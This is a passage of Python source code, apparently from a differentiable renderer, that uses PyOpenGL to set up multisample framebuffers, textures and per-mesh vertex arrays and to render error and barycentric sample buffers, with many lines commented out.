# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
# self.textureGTLoc = GL.glGetUniformLocation(self.errorTextureProgram, "imageGT")
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# #
# try:
# if self.imageGT.r is not None and self.imageGT.r.size != 0: #if GT image is defined.
# image = np.array(np.flipud((self.imageGT.r)), order='C', dtype=np.float32)
# GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# except:
# pass
# GL.glGenTextures(1, self.textureEdges)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureEdges)
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# texture = GL.GLuint(0)
# GL.glGenTextures(1, texture)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# image = np.array(np.flipud((self.textures_list[mesh][polygons])), order='C', dtype=np.float32)
# GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
GL.glBindTexture(GL.GL_TEXTURE_2D, 0)
GL.glActiveTexture(GL.GL_TEXTURE0)
whitePixel = np.ones([4, 4, 3])
self.whitePixelTextureID = GL.GLuint(0)
GL.glGenTextures(1, self.whitePixelTextureID)
GL.glBindTexture(GL.GL_TEXTURE_2D, self.whitePixelTextureID)
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT, 1)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D,GL.GL_TEXTURE_WRAP_S,GL.GL_CLAMP_TO_EDGE)
GL.glTexParameteri(GL.GL_TEXTURE_2D,GL.GL_TEXTURE_WRAP_T,GL.GL_CLAMP_TO_EDGE)
image = np.array(np.flipud((whitePixel)), order='C', dtype=np.float32)
GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, GL.GL_RGB32F, image.shape[1], image.shape[0], 0, GL.GL_RGB, GL.GL_FLOAT, image)
# GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGBA8, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
self.fbo_ms_errors = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_ms_errors)
self.texture_errors_render = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RGB8, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
self.texture_errors_sample_position = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
self.texture_errors_sample_faces = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_R32UI, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces, 0)
#
self.texture_errors_sample_barycentric1 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1,
0)
self.texture_errors_sample_barycentric2 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2,
0)
self.z_buf_ms_errors = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'],
False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors, 0)
# self.z_buf_ms_errors = GL.glGenRenderbuffers(1)
# GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
# GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
# GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.fbo_sample_fetch = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_sample_fetch)
self.render_buffer_fetch_sample_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
self.render_buffer_fetch_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
self.render_buffer_fetch_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
#
self.render_buffer_fetch_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
self.render_buffer_fetch_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
self.z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
# FBO_f
self.fbo_errors_nonms = GL.glGenFramebuffers(1)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_errors_nonms)
render_buf_errors_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, render_buf_errors_render)
render_buf_errors_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
render_buf_errors_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
#
render_buf_errors_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
render_buf_errors_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
#
z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.textureObjLoc = GL.glGetUniformLocation(self.errorTextureProgram, "myTextureSampler")
# Add background cube:
position_location = GL.glGetAttribLocation(self.errorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.errorTextureProgram, 'colorIn')
uvs_location = GL.glGetAttribLocation(self.errorTextureProgram, 'vertexUV')
face_ids_location = GL.glGetAttribLocation(self.errorTextureProgram, 'face_id')
barycentric_location = GL.glGetAttribLocation(self.errorTextureProgram, 'barycentric')
# self.vbo_verts_cube= vbo.VBO(np.array(self.v_bgCube).astype(np.float32))
# self.vbo_colors_cube= vbo.VBO(np.array(self.vc_bgCube).astype(np.float32))
# self.vbo_uvs_cube = vbo.VBO(np.array(self.ft_bgCube).astype(np.float32))
# self.vao_bgCube = GL.GLuint(0)
# GL.glGenVertexArrays(1, self.vao_bgCube)
#
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube = vbo.VBO(np.array(self.f_bgCube).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
# self.vbo_f_bgCube.bind()
# self.vbo_verts_cube.bind()
# GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_colors_cube.bind()
# GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_uvs_cube.bind()
# GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#
# f = self.f_bgCube
# fc = np.tile(np.arange(len(self.f), len(self.f) + len(f))[:, None], [1, 3]).ravel()
# # fc[:, 0] = fc[:, 0] & 255
# # fc[:, 1] = (fc[:, 1] >> 8) & 255
# # fc[:, 2] = (fc[:, 2] >> 16) & 255
# fc = np.asarray(fc, dtype=np.uint32)
# vbo_face_ids_cube = vbo.VBO(fc)
# vbo_face_ids_cube.bind()
# GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
# GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
#
# #Barycentric cube:
# f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
# vbo_barycentric_cube = vbo.VBO(f_barycentric)
# vbo_barycentric_cube.bind()
# GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_quad = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_quad)
GL.glBindVertexArray(self.vao_quad)
# Bind VAO
self.vbo_face_ids_list = []
self.vbo_barycentric_list = []
self.vao_errors_mesh_list = []
flen = 1
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_face_ids_mesh = []
vbo_barycentric_mesh = []
for polygons in np.arange(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_f.bind()
vbo_verts = self.vbo_verts_mesh[mesh][polygons]
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors = self.vbo_colors_mesh[mesh][polygons]
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_uvs = self.vbo_uvs_mesh[mesh][polygons]
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
f = self.f_list[mesh][polygons]
fc = np.tile(np.arange(flen, flen + len(f))[:, None], [1, 3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
vbo_face_ids = vbo.VBO(fc)
vbo_face_ids.bind()
GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
vbo_barycentric = vbo.VBO(f_barycentric)
vbo_barycentric.bind()
GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
flen += len(f)
vaos_mesh += [vao]
vbo_face_ids_mesh += [vbo_face_ids]
vbo_barycentric_mesh += [vbo_face_ids]
GL.glBindVertexArray(0)
self.vbo_face_ids_list += [vbo_face_ids_mesh]
self.vbo_barycentric_list += [vbo_barycentric_mesh]
self.vao_errors_mesh_list += [vaos_mesh]
def render_image_buffers(self):
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
self.makeCurrentContext()
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1 % self.num_channels], self.bgcolor.r[2 % self.num_channels], 1.)
GL.glUseProgram(self.errorTextureProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3, GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
# GL.glClearBufferiv(GL.GL_COLOR, 0, 0)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
#ImageGT
GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glBindImageTexture(1,self.textureGT, 0, GL.GL_FALSE, 0, GL.GL_READ_ONLY, GL.GL_RGBA8)
GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
self.textureGTLoc = GL.glGetUniformLocation(self.errorTextureProgram, "imageGT")
GL.glUniform1i(self.textureGTLoc, 1)
wwLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_errors_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
# vbo_color.bind()
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if self.f.shape[1] == 2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
assert (primtype == GL.GL_TRIANGLES)
# GL.glUseProgram(self.errorTextureProgram)
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
else:
texture = self.whitePixelTextureID
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureObjLoc, 0)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
# # #Background cube:
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube.bind()
# texture = self.whitePixelTextureID
# self.vbo_uvs_cube.bind()
#
# GL.glActiveTexture(GL.GL_TEXTURE0)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# GL.glUniform1i(self.textureObjLoc, 0)
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube)*self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
# self.draw_visibility_image_ms(self.v, self.f)
# GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# # result_blit = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# result_blit2 = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# result_blit_pos = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
GL.glUseProgram(self.fetchSamplesProgram)
# GL.glDisable(GL.GL_MULTISAMPLE)
self.colorsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "colors")
self.sample_positionsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_positions")
self.sample_facesLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_faces")
self.sample_barycentric1Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords1")
self.sample_barycentric2Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords2")
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glActiveTexture(GL.GL_TEXTURE2)
